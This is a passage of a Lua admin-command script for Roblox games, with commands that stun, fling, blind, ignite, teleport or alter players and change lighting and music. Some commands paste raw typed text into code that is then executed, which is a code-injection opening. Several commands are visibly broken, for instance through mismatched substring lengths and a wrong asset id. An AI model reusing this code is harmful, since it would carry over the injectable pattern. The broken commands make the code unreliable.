  1254. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1255. for i, v in pairs(plrz) do
  1256. coroutine.resume(coroutine.create(function()
  1257. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1258. v.Character.Humanoid.PlatformStand = true
  1259. end
  1260. end))
  1261. end
  1262. end
  1263.  
  1264. if Cmd.Text:lower():sub(1,7) == "unstun " then
  1265. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1266. for i, v in pairs(plrz) do
  1267. coroutine.resume(coroutine.create(function()
  1268. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1269. v.Character.Humanoid.PlatformStand = false
  1270. end
  1271. end))
  1272. end
  1273. end
  1274.  
  1275. if Cmd.Text:lower():sub(1,5) == "jump " then
  1276. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1277. for i, v in pairs(plrz) do
  1278. coroutine.resume(coroutine.create(function()
  1279. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1280. v.Character.Humanoid.Jump = true
  1281. end
  1282. end))
  1283. end
  1284. end
  1285.  
  1286. if Cmd.Text:lower():sub(1,4) == "sit " then
  1287. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1288. for i, v in pairs(plrz) do
  1289. coroutine.resume(coroutine.create(function()
  1290. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1291. v.Character.Humanoid.Sit = true
  1292. end
  1293. end))
  1294. end
  1295. end
  1296.  
  1297. if Cmd.Text:lower():sub(1,10) == "invisible " then
  1298. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1299. for i, v in pairs(plrz) do
  1300. coroutine.resume(coroutine.create(function()
  1301. if v and v.Character then
  1302. for a, obj in pairs(v.Character:children()) do
  1303. if obj:IsA("BasePart") then obj.Transparency = 1 if obj:findFirstChild("face") then obj.face.Transparency = 1 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 1 end
  1304. end
  1305. end
  1306. end))
  1307. end
  1308. end
  1309.  
  1310. if Cmd.Text:lower():sub(1,8) == "visible " then
  1311. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1312. for i, v in pairs(plrz) do
  1313. coroutine.resume(coroutine.create(function()
  1314. if v and v.Character then
  1315. for a, obj in pairs(v.Character:children()) do
  1316. if obj:IsA("BasePart") then obj.Transparency = 0 if obj:findFirstChild("face") then obj.face.Transparency = 0 end elseif obj:IsA("Hat") and obj:findFirstChild("Handle") then obj.Handle.Transparency = 0 end
  1317. end
  1318. end
  1319. end))
  1320. end
  1321. end
  1322.  
  1323.  
  1324.  
  1325. if Cmd.Text:lower():sub(1,5) == "fire " then
  1326. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1327. for i, v in pairs(plrz) do
  1328. coroutine.resume(coroutine.create(function()
  1329. if v and v.Character and v.Character:findFirstChild("Torso") then
  1330. local cl = Instance.new("Fire", v.Character.Torso)
  1331. end
  1332. end))
  1333. end
  1334. end
  1335.  
  1336. if Cmd.Text:lower():sub(1,7) == "unfire " then
  1337. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1338. for i, v in pairs(plrz) do
  1339. coroutine.resume(coroutine.create(function()
  1340. if v and v.Character and v.Character:findFirstChild("Torso") then
  1341. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Fire") then cl:Destroy() end end
  1342. end
  1343. end))
  1344. end
  1345. end
  1346.  
  1347. if Cmd.Text:lower():sub(1,6) == "smoke " then
  1348. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1349. for i, v in pairs(plrz) do
  1350. coroutine.resume(coroutine.create(function()
  1351. if v and v.Character and v.Character:findFirstChild("Torso") then
  1352. local cl = Instance.new("Smoke", v.Character.Torso)
  1353. end
  1354. end))
  1355. end
  1356. end
  1357.  
  1358. if Cmd.Text:lower():sub(1,8) == "unsmoke " then
  1359. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1360. for i, v in pairs(plrz) do
  1361. coroutine.resume(coroutine.create(function()
  1362. if v and v.Character and v.Character:findFirstChild("Torso") then
  1363. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Smoke") then cl:Destroy() end end
  1364. end
  1365. end))
  1366. end
  1367. end
  1368.  
  1369. if Cmd.Text:lower():sub(1,9) == "sparkles " then
  1370. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1371. for i, v in pairs(plrz) do
  1372. coroutine.resume(coroutine.create(function()
  1373. if v and v.Character and v.Character:findFirstChild("Torso") then
  1374. local cl = Instance.new("Sparkles", v.Character.Torso)
  1375. end
  1376. end))
  1377. end
  1378. end
  1379.  
  1380. if Cmd.Text:lower():sub(1,11) == "unsparkles " then
  1381. local plrz = GetPlr(plr, Cmd.Text:lower():sub(12))
  1382. for i, v in pairs(plrz) do
  1383. coroutine.resume(coroutine.create(function()
  1384. if v and v.Character and v.Character:findFirstChild("Torso") then
  1385. for z, cl in pairs(v.Character.Torso:children()) do if cl:IsA("Sparkles") then cl:Destroy() end end
  1386. end
  1387. end))
  1388. end
  1389. end
  1390.  
  1391. if Cmd.Text:lower():sub(1,3) == "ff " then
  1392. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4))
  1393. for i, v in pairs(plrz) do
  1394. coroutine.resume(coroutine.create(function()
  1395. if v and v.Character then Instance.new("ForceField", v.Character) end
  1396. end))
  1397. end
  1398. end
  1399.  
  1400. if Cmd.Text:lower():sub(1,5) == "unff " then
  1401. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1402. for i, v in pairs(plrz) do
  1403. coroutine.resume(coroutine.create(function()
  1404. if v and v.Character then
  1405. for z, cl in pairs(v.Character:children()) do if cl:IsA("ForceField") then cl:Destroy() end end
  1406. end
  1407. end))
  1408. end
  1409. end
  1410.  
  1411. if Cmd.Text:lower():sub(1,7) == "freeze " then
  1412. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1413. for i, v in pairs(plrz) do
  1414. coroutine.resume(coroutine.create(function()
  1415. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1416. for a, obj in pairs(v.Character:children()) do
  1417. if obj:IsA("BasePart") then obj.Anchored = true end v.Character.Humanoid.WalkSpeed = 0
  1418. end
  1419. end
  1420. end))
  1421. end
  1422. end
  1423.  
  1424. if Cmd.Text:lower():sub(1,5) == "thaw " then
  1425. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1426. for i, v in pairs(plrz) do
  1427. coroutine.resume(coroutine.create(function()
  1428. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1429. for a, obj in pairs(v.Character:children()) do
  1430. if obj:IsA("BasePart") then obj.Anchored = false end v.Character.Humanoid.WalkSpeed = 16
  1431. end
  1432. end
  1433. end))
  1434. end
  1435. end
  1436.  
  1437.  
  1438.  
  1439. if Cmd.Text:lower():sub(1,4) == "god " then
  1440. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5))
  1441. for i, v in pairs(plrz) do
  1442. coroutine.resume(coroutine.create(function()
  1443. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1444. v.Character.Humanoid.MaxHealth = math.huge
  1445. v.Character.Humanoid.Health = 9e9
  1446. end
  1447. end))
  1448. end
  1449. end
  1450.  
  1451. if Cmd.Text:lower():sub(1,6) == "ungod " then
  1452. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1453. for i, v in pairs(plrz) do
  1454. coroutine.resume(coroutine.create(function()
  1455. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1456. v.Character.Humanoid.MaxHealth = 100
  1457. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1458. end
  1459. end))
  1460. end
  1461. end
  1462.  
  1463. if Cmd.Text:lower():sub(1,8) == "ambient " then
  1464. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1465. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1466. game.Lighting.Ambient = Color3.new(Cmd.Text:sub(9,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1467. end
  1468.  
  1469. if Cmd.Text:lower():sub(1,11) == "brightness " then
  1470. game.Lighting.Brightness = Cmd.Text:sub(12)
  1471. end
  1472.  
  1473. if Cmd.Text:lower():sub(1,5) == "time " then
  1474. game.Lighting.TimeOfDay = Cmd.Text:sub(6)
  1475. end
  1476.  
  1477. if Cmd.Text:lower():sub(1,9) == "fogcolor " then
  1478. local chk1 = Cmd.Text:lower():sub(10):find(" ") + 9
  1479. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1480. game.Lighting.FogColor = Color3.new(Cmd.Text:sub(10,chk1-1),Cmd.Text:sub(chk1+1,chk2-1),Cmd.Text:sub(chk2+1))
  1481. end
  1482.  
  1483. if Cmd.Text:lower():sub(1,7) == "fogend " then
  1484. game.Lighting.FogEnd = Cmd.Text:sub(8)
  1485. end
  1486.  
  1487. if Cmd.Text:lower():sub(1,9) == "fogstart " then
  1488. game.Lighting.FogStart = Cmd.Text:sub(10)
  1489. end
  1490.  
  1491.  
  1492.  
  1493. if Cmd.Text:lower():sub(1,12) == "rtools " then
  1494. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1495. for i, v in pairs(plrz) do
  1496. coroutine.resume(coroutine.create(function()
  1497. if v and v.Character and v:findFirstChild("Backpack") then
  1498. for a, tool in pairs(v.Character:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1499. for a, tool in pairs(v.Backpack:children()) do if tool:IsA("Tool") or tool:IsA("HopperBin") then tool:Destroy() end end
  1500. end
  1501. end))
  1502. end
  1503. end
  1504.  
  1505.  
  1506.  
  1507.  
  1508.  
  1509.  
  1510.  
  1511. if Cmd.Text:lower():sub(1,8) == "shealth " then
  1512. local chk1 = Cmd.Text:lower():sub(9):find(" ") + 8
  1513. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9,chk1-1))
  1514. for i, v in pairs(plrz) do
  1515. coroutine.resume(coroutine.create(function()
  1516. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1517. v.Character.Humanoid.MaxHealth = Cmd.Text:sub(chk1+1)
  1518. v.Character.Humanoid.Health = v.Character.Humanoid.MaxHealth
  1519. end
  1520. end))
  1521. end
  1522. end
  1523.  
  1524. if Cmd.Text:lower():sub(1,6) == "speed " then
  1525. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1526. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1527. for i, v in pairs(plrz) do
  1528. coroutine.resume(coroutine.create(function()
  1529. if v and v.Character and v.Character:findFirstChild("Humanoid") then
  1530. v.Character.Humanoid.WalkSpeed = Cmd.Text:sub(chk1+1)
  1531. end
  1532. end))
  1533. end
  1534. end
  1535.  
  1536.  
  1537. if Cmd.Text:lower():sub(1,10) == "teleplace " then
  1538. local chk1 = Cmd.Text:lower():sub(11):find(" ") + 10
  1539. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11,chk1-1))
  1540. for i, v in pairs(plrz) do
  1541. coroutine.resume(coroutine.create(function()
  1542. if v and v:findFirstChild("PlayerGui") then
  1543. local cl = script.LocalScriptBase:Clone() cl.Code.Value = [[game:service("TeleportService"):Teleport(]] .. Cmd.Text:sub(chk1+1) .. ")" cl.Parent = v.PlayerGui cl.Disabled = false
  1544. end
  1545. end))
  1546. end
  1547. end
  1548.  
  1549. if Cmd.Text:lower():sub(1,3) == "tp " then
  1550. local chk1 = Cmd.Text:lower():sub(4):find(" ") + 3
  1551. local plrz = GetPlr(plr, Cmd.Text:lower():sub(4,chk1-1))
  1552. local plrz2 = GetPlr(plr, Cmd.Text:lower():sub(chk1+1))
  1553. for i, v in pairs(plrz) do
  1554. coroutine.resume(coroutine.create(function()
  1555. for i2, v2 in pairs(plrz2) do
  1556. if v and v2 and v.Character and v2.Character and v.Character:findFirstChild("Torso") and v2.Character:findFirstChild("Torso") then
  1557. v.Character.Torso.CFrame = v2.Character.Torso.CFrame + Vector3.new(math.random(-1,1),0,math.random(-1,1))
  1558. end
  1559. end
  1560. end))
  1561. end
  1562. end
  1563.  
  1564. if Cmd.Text:lower():sub(1,7) == "statchange " then
  1565. local chk1 = Cmd.Text:lower():sub(8):find(" ") + 7
  1566. local chk2 = Cmd.Text:sub(chk1+1):find(" ") + chk1
  1567. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8,chk1-1))
  1568. for i, v in pairs(plrz) do
  1569. coroutine.resume(coroutine.create(function()
  1570. if v and v:findFirstChild("leaderstats") then
  1571. for a, st in pairs(v.leaderstats:children()) do
  1572. if st.Name:lower():find(Cmd.Text:sub(chk1+1,chk2-1)) == 1 then st.Value = Cmd.Text:sub(chk2+1) end
  1573. end
  1574. end
  1575. end))
  1576. end
  1577. end
  1578.  
  1579. if Cmd.Text:lower():sub(1,6) == "shirt " then
  1580. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1581. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1582. for i, v in pairs(plrz) do
  1583. coroutine.resume(coroutine.create(function()
  1584. if v and v.Character then
  1585. for i,v in pairs(v.Character:children()) do
  1586. if v:IsA("Shirt") then local cl = v:Clone() cl.Parent = v.Parent cl.ShirtTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1587. end
  1588. end
  1589. end))
  1590. end
  1591. end
  1592.  
  1593. if Cmd.Text:lower():sub(1,6) == "pants " then
  1594. local chk1 = Cmd.Text:lower():sub(7):find(" ") + 6
  1595. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7,chk1-1))
  1596. for i, v in pairs(plrz) do
  1597. coroutine.resume(coroutine.create(function()
  1598. if v and v.Character then
  1599. for i,v in pairs(v.Character:children()) do
  1600. if v:IsA("Pants") then local cl = v:Clone() cl.Parent = v.Parent cl.PantsTemplate = "http://www.roblox.com/asset/?id=" .. chk1 v:Destroy() end
  1601. end
  1602. end
  1603. end))
  1604. end
  1605. end
  1606.  
  1607. if Cmd.Text:lower():sub(1,5) == "gear " then
  1608. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1609. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6, chk1-1))
  1610. for i, v in pairs(plrz) do
  1611. if Cmd.Text:lower():sub(6) == "all" then return end
  1612. if Cmd.Text:lower():sub(6) == "others"then return end
  1613. if Cmd.Text:lower():sub(6) == "nonadmins" then return end
  1614. coroutine.resume(coroutine.create(function()
  1615. if v and v:findFirstChild("Backpack") then
  1616. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1617. for a,g in pairs(obj:children()) do if g:IsA("Tool") or g:IsA("HopperBin") then g.Parent = v.Backpack end end
  1618. obj:Destroy()
  1619. end
  1620. end))
  1621. end
  1622. end
  1623.  
  1624. if Cmd.Text:lower():sub(1,5) == "face " then
  1625. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1626. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1627. for i, v in pairs(plrz) do
  1628. coroutine.resume(coroutine.create(function()
  1629. if v and v.Character and v.Character:findFirstChild("Head") and v.Character.Head:findFirstChild("face") then
  1630. v.Character.Head:findFirstChild("face").Texture = "http://www.roblox.com/asset/?id=" .. chk1
  1631. end
  1632. end))
  1633. end
  1634. end
  1635.  
  1636.  
  1637.  
  1638.  
  1639.  
  1640.  
  1641. if Cmd.Text:lower():sub(1,6) == "music " then
  1642. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1643. local id = Cmd.Text:sub(7)
  1644. local pitch = 1
  1645. if tostring(id):lower():find("caramell") then id = 2303479 end
  1646. if tostring(id):find("epic") then id = 27697743 pitch = 2.5 end
  1647. if tostring(id):find("rick") then id = 2027611 end
  1648. if tostring(id):find("halo") then id = 1034065 end
  1649. if tostring(id):find("pokemon") then id = 1372261 end
  1650. if tostring(id):find("cursed") then id = 1372257 end
  1651. if tostring(id):find("extreme") then id = 11420933 end
  1652. if tostring(id):find("awaken") then id = 27697277 end
  1653. if tostring(id):find("alone") then id = 27697392 end
  1654. if tostring(id):find("mario") then id = 1280470 end
  1655. if tostring(id):find("choir") then id = 1372258 end
  1656. if tostring(id):find("chrono") then id = 1280463 end
  1657. if tostring(id):find("dotr") then id = 11420922 end
  1658. if tostring(id):find("entertain") then id = 27697267 end
  1659. if tostring(id):find("fantasy") then id = 1280473 end
  1660. if tostring(id):find("final") then id = 1280414 end
  1661. if tostring(id):find("emblem") then id = 1372259 end
  1662. if tostring(id):find("flight") then id = 27697719 end
  1663. if tostring(id):find("banjo") then id = 27697298 end
  1664. if tostring(id):find("gothic") then id = 27697743 end
  1665. if tostring(id):find("hiphop") then id = 27697735 end
  1666. if tostring(id):find("intro") then id = 27697707 end
  1667. if tostring(id):find("mule") then id = 1077604 end
  1668. if tostring(id):find("film") then id = 27697713 end
  1669. if tostring(id):find("nezz") then id = 8610025 end
  1670. if tostring(id):find("angel") then id = 1372260 end
  1671. if tostring(id):find("resist") then id = 27697234 end
  1672. if tostring(id):find("schala") then id = 5985787 end
  1673. if tostring(id):find("organ") then id = 11231513 end
  1674. if tostring(id):find("tunnel") then id = 9650822 end
  1675. if tostring(id):find("spanish") then id = 5982975 end
  1676. if tostring(id):find("venom") then id = 1372262 end
  1677. if tostring(id):find("wind") then id = 1015394 end
  1678. if tostring(id):find("guitar") then id = 5986151 end
  1679. if tostring(id):find("fox") then id = 130797915 end
  1680. if tostring(id):find("gangnam") then id = 130844430 end
  1681. if tostring(id):find("nyan") then id = 130786686 end
  1682. if tostring(id):find("harlem") then id = 131154740 end
  1683. local s = Instance.new("Sound", game.Workspace) s.SoundId = "http://www.roblox.com/asset/?id=" .. id s.Volume = 1 s.Pitch = pitch s.Looped = true s.archivable = false repeat s:Play() wait(2.5) s:Stop() wait(.5) s:Play() until s.IsPlaying
  1684. end
  1685.  
  1686. if Cmd.Text:lower() == "stopmusic" then
  1687. for i, v in pairs(game.Workspace:children()) do if v:IsA("Sound") then v:Destroy() end end
  1688. end
  1689.  
  1690. if Cmd.Text:lower() == "musiclist" then
  1691. if plr.PlayerGui:findFirstChild("MUSICGUI") then return end
  1692. local scr, cmf, ent, num = ScrollGui() scr.Name = "MUSICGUI" scr.Parent = plr.PlayerGui
  1693. local list = {"caramell","epic","rick","halo","pokemon","cursed","extreme","awaken","alone","mario","choir","chrono","dotr","entertain","Harlem","Nyan","Fox","Gangnam","fantasy","final","emblem","flight","banjo","gothic","hiphop","intro","mule","film","nezz","angel","resist","schala","organ","tunnel","spanish","venom","wind","guitar"}
  1694. for i, v in pairs(list) do local cl = ent:Clone() cl.Parent = cmf cl.Text = v cl.Position = UDim2.new(0,0,0,num*20) num = num +1 end
  1695. end
  1696.  
  1697.  
  1698. if Cmd.Text:lower():sub(1,5) == "spin " then
  1699. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1700. for i, v in pairs(plrz) do
  1701. coroutine.resume(coroutine.create(function()
  1702. if v and v.Character and v.Character:findFirstChild("Torso") then
  1703. for i,v in pairs(v.Character.Torso:children()) do if v.Name == "SPINNER" then v:Destroy() end end
  1704. local torso = v.Character:findFirstChild("Torso")
  1705. local bg = Instance.new("BodyGyro", torso) bg.Name = "SPINNER" bg.maxTorque = Vector3.new(0,math.huge,0) bg.P = 11111 bg.cframe = torso.CFrame table.insert(objects,bg)
  1706. repeat wait(1/44) bg.cframe = bg.cframe * CFrame.Angles(0,math.rad(30),0)
  1707. until not bg or bg.Parent ~= torso
  1708. end
  1709. end))
  1710. end
  1711. end
  1712.  
  1713. if Cmd.Text:lower():sub(1,7) == "unspin " then
  1714. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1715. for i, v in pairs(plrz) do
  1716. coroutine.resume(coroutine.create(function()
  1717. if v and v.Character and v.Character:findFirstChild("Torso") then
  1718. for a,q in pairs(v.Character.Torso:children()) do if q.Name == "SPINNER" then q:Destroy() end end
  1719. end
  1720. end))
  1721. end
  1722. end
  1723.  
  1724.  
  1725.  
  1726. if Cmd.Text:lower():sub(1,8) == "bighead " then
  1727. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1728. for i, v in pairs(plrz) do
  1729. coroutine.resume(coroutine.create(function()
  1730. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(3,3,3) v.Character.Torso.Neck.C0 = CFrame.new(0,1.9,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1731. end))
  1732. end
  1733. end
  1734.  
  1735. if Cmd.Text:lower():sub(1,9) == "minihead " then
  1736. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1737. for i, v in pairs(plrz) do
  1738. coroutine.resume(coroutine.create(function()
  1739. if v and v.Character then v.Character.Head.Mesh.Scale = Vector3.new(.75,.75,.75) v.Character.Torso.Neck.C0 = CFrame.new(0,.8,0) * CFrame.Angles(math.rad(90),math.rad(180),0) end
  1740. end))
  1741. end
  1742. end
  1743.  
  1744. if Cmd.Text:lower():sub(1,6) == "fling " then
  1745. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1746. for i, v in pairs(plrz) do
  1747. coroutine.resume(coroutine.create(function()
  1748. if v and v.Character and v.Character:findFirstChild("Torso") and v.Character:findFirstChild("Humanoid") then
  1749. local xran local zran
  1750. repeat xran = math.random(-9999,9999) until math.abs(xran) >= 5555
  1751. repeat zran = math.random(-9999,9999) until math.abs(zran) >= 5555
  1752. v.Character.Humanoid.Sit = true v.Character.Torso.Velocity = Vector3.new(0,0,0)
  1753. local frc = Instance.new("BodyForce", v.Character.Torso) frc.Name = "BFRC" frc.force = Vector3.new(xran*4,9999*5,zran*4) game:service("Debris"):AddItem(frc,.1)
  1754. end
  1755. end))
  1756. end
  1757. end
  1758.  
  1759. if Cmd.Text:lower():sub(1,8) == "seizure " then
  1760. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1761. for i, v in pairs(plrz) do
  1762. coroutine.resume(coroutine.create(function()
  1763. if v and v.Character then
  1764. v.Character.Torso.CFrame = v.Character.Torso.CFrame * CFrame.Angles(math.rad(90),0,0)
  1765. end
  1766. end))
  1767. end
  1768. end
  1769.  
  1770. if Cmd.Text:lower():sub(1,10) == "unseizure " then
  1771. local plrz = GetPlr(plr, Cmd.Text:lower():sub(11))
  1772. for i, v in pairs(plrz) do
  1773. coroutine.resume(coroutine.create(function()
  1774. if v and v.Character then
  1775. for i,v in pairs(v.Character:children()) do if v.Name == "SeizureBase" then v:Destroy() end end
  1776. wait(.1) v.Character.Humanoid.PlatformStand = false
  1777. end
  1778. end))
  1779. end
  1780. end
  1781.  
  1782. if Cmd.Text:lower():sub(1,12) == "rlimbs " then
  1783. local plrz = GetPlr(plr, Cmd.Text:lower():sub(13))
  1784. for i, v in pairs(plrz) do
  1785. coroutine.resume(coroutine.create(function()
  1786. if v and v.Character then
  1787. for a, obj in pairs(v.Character:children()) do
  1788. if obj:IsA("BasePart") and (obj.Name:find("Leg") or obj.Name:find("Arm")) then obj:Destroy() end
  1789. end
  1790. end
  1791. end))
  1792. end
  1793. end
  1794.  
  1795.  
  1796. if Cmd.Text:lower():sub(1,5) == "char " then
  1797. local chk1 = Cmd.Text:lower():sub(6):find(" ") + 5
  1798. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1799. for i, v in pairs(plrz) do
  1800. coroutine.resume(coroutine.create(function()
  1801. if v and v.Character then
  1802. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. Cmd.Text:sub(chk1+1)
  1803. v:LoadCharacter()
  1804. end
  1805. end))
  1806. end
  1807. end
  1808.  
  1809. if Cmd.Text:lower():sub(1,7) == "unchar " then
  1810. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1811. for i, v in pairs(plrz) do
  1812. coroutine.resume(coroutine.create(function()
  1813. if v and v.Character then
  1814. v.CharacterAppearance = "http://www.roblox.com/asset/CharacterFetch.ashx?userId=" .. v.userId
  1815. v:LoadCharacter()
  1816. end
  1817. end))
  1818. end
  1819. end
  1820.  
  1821.  
  1822.  
  1823. if Cmd.Text:lower():sub(1,7) == "normal " then
  1824. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1825. for i, v in pairs(plrz) do
  1826. coroutine.resume(coroutine.create(function()
  1827. if v and v.Character and v.Character:findFirstChild("Torso") then
  1828. if v.Character:findFirstChild("Head") then v.Character.Head.Mesh.Scale = Vector3.new(1.25,1.25,1.25) end
  1829. if v.Character.Torso:findFirstChild("Shirt") then v.Character.Torso.Shirt.Parent = v.Character end
  1830. if v.Character.Torso:findFirstChild("Pants") then v.Character.Torso.Pants.Parent = v.Character end
  1831. v.Character.Torso.Transparency = 0
  1832. v.Character.Torso.Neck.C0 = CFrame.new(0,1,0) * CFrame.Angles(math.rad(90),math.rad(180),0)
  1833. v.Character.Torso["Right Shoulder"].C0 = CFrame.new(1,.5,0) * CFrame.Angles(0,math.rad(90),0)
  1834. v.Character.Torso["Left Shoulder"].C0 = CFrame.new(-1,.5,0) * CFrame.Angles(0,math.rad(-90),0)
  1835. v.Character.Torso["Right Hip"].C0 = CFrame.new(1,-1,0) * CFrame.Angles(0,math.rad(90),0)
  1836. v.Character.Torso["Left Hip"].C0 = CFrame.new(-1,-1,0) * CFrame.Angles(0,math.rad(-90),0)
  1837. for a, sc in pairs(v.Character:children()) do if sc.Name == "ify" then sc:Destroy() end end
  1838. for a, prt in pairs(v.Character:children()) do if prt:IsA("BasePart") and (prt.Name ~= "Head" or not prt.Parent:findFirstChild("NameTag", true)) then
  1839. prt.Transparency = 0 prt.Reflectance = 0 prt.BrickColor = BrickColor.new("White")
  1840. if prt.Name == "FAKETORSO" then prt:Destroy() end
  1841. elseif prt:findFirstChild("NameTag") then prt.Head.Transparency = 0 prt.Head.Reflectance = 0 prt.Head.BrickColor = BrickColor.new("White")
  1842. end end
  1843. end
  1844. end))
  1845. end
  1846. end
  1847.  
  1848. if Cmd.Text:lower():sub(1,7) == "trippy " then
  1849. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1850. for i, v in pairs(plrz) do
  1851. coroutine.resume(coroutine.create(function()
  1852. if v and v:findFirstChild("PlayerGui")then
  1853. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1854. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUITRIPPY"
  1855. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1856. local cl = script.ScriptBase:Clone() cl.Code.Value = [[repeat wait(1/44) script.Parent.Frame.BackgroundColor3 = Color3.new(math.random(255)/255,math.random(255)/255,math.random(255)/255) until nil]] cl.Parent = scr cl.Disabled = false
  1857. end
  1858. end))
  1859. end
  1860. end
  1861.  
  1862. if Cmd.Text:lower():sub(1,9) == "untrippy " then
  1863. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1864. for i, v in pairs(plrz) do
  1865. coroutine.resume(coroutine.create(function()
  1866. if v and v:findFirstChild("PlayerGui") then
  1867. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUITRIPPY" then g:Destroy() end end
  1868. end
  1869. end))
  1870. end
  1871. end
  1872.  
  1873.  
  1874. if Cmd.Text:lower():sub(1,6) == "blind " then
  1875. local plrz = GetPlr(plr, Cmd.Text:lower():sub(7))
  1876. for i, v in pairs(plrz) do
  1877. coroutine.resume(coroutine.create(function()
  1878. if v and v:findFirstChild("PlayerGui") then
  1879. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1880. local scr = Instance.new("ScreenGui", v.PlayerGui) scr.Name = "EFFECTGUIBLIND"
  1881. local bg = Instance.new("Frame", scr) bg.BackgroundColor3 = Color3.new(0,0,0) bg.BackgroundTransparency = 0 bg.Size = UDim2.new(10,0,10,0) bg.Position = UDim2.new(-5,0,-5,0) bg.ZIndex = 10
  1882. end
  1883. end))
  1884. end
  1885. end
  1886.  
  1887. if Cmd.Text:lower():sub(1,8) == "unblind " then
  1888. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1889. for i, v in pairs(plrz) do
  1890. coroutine.resume(coroutine.create(function()
  1891. if v and v:findFirstChild("PlayerGui") then
  1892. for a, g in pairs(v.PlayerGui:children()) do if g.Name == "EFFECTGUIBLIND" then g:Destroy() end end
  1893. end
  1894. end))
  1895. end
  1896. end
  1897.  
  1898. if Cmd.Text:lower():sub(1,7) == "guifix " then
  1899. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1900. for i, v in pairs(plrz) do
  1901. coroutine.resume(coroutine.create(function()
  1902. if v and v:findFirstChild("PlayerGui") then
  1903. for a, g in pairs(v.PlayerGui:children()) do if g.Name:sub(1,9) == "EFFECTGUI" then g:Destroy() end end
  1904. end
  1905. end))
  1906. end
  1907. end
  1908.  
  1909. if Cmd.Text:lower():sub(1,9) == "loopheal " then
  1910. local plrz = GetPlr(plr, Cmd.Text:lower():sub(10))
  1911. for i, v in pairs(plrz) do
  1912. if v then
  1913. local cl = script.ScriptBase:Clone() cl.Name = "LoopHeal:"..v.Name cl.Code.Value = [[
  1914. local plr = game.Players:findFirstChild("]] .. v.Name .. [[")
  1915. repeat wait()
  1916. coroutine.resume(coroutine.create(function()
  1917. if plr and plr.Character and plr.Character:findFirstChild("Humanoid") then
